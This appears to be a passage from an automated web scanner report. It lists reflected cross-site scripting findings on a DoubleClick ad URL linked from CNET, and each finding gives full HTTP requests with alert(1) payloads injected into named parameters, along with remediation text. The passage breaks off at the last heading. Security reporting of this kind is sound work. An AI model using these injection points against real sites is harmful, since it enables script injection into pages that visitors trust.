GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97230'-alert(1)-'d278434a2 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d51"-alert(1)-"68a22fe282e was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86835'-alert(1)-'acccea5abcb was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcb HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1c7"-alert(1)-"3bd2dbe41e8 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1b1c7"-alert(1)-"3bd2dbe41e8&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f446'-alert(1)-'ad85bf69864 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn1f446'-alert(1)-'ad85bf69864&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d52"-alert(1)-"8cd047b7e6e was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USb3d52"-alert(1)-"8cd047b7e6e&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9916'-alert(1)-'a98a38d25af was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_USc9916'-alert(1)-'a98a38d25af&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3887'-alert(1)-'475192829dd was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686f3887'-alert(1)-'475192829dd&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55903"-alert(1)-"845905cb38 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=3068655903"-alert(1)-"845905cb38&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22a4c"-alert(1)-"de1f191fdee was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a22a4c"-alert(1)-"de1f191fdee&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bb96'-alert(1)-'908dcb3612e was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a4bb96'-alert(1)-'908dcb3612e&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cf37'-alert(1)-'450e0e876d3 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=2cf37'-alert(1)-'450e0e876d3&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9378a"-alert(1)-"c9b031313ac was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=9378a"-alert(1)-"c9b031313ac&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f0ad'-alert(1)-'2732c1fdd68 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com8f0ad'-alert(1)-'2732c1fdd68&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce5d5"-alert(1)-"1bfb13a346d was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.comce5d5"-alert(1)-"1bfb13a346d&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b324'-alert(1)-'1aa36b96c8d was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
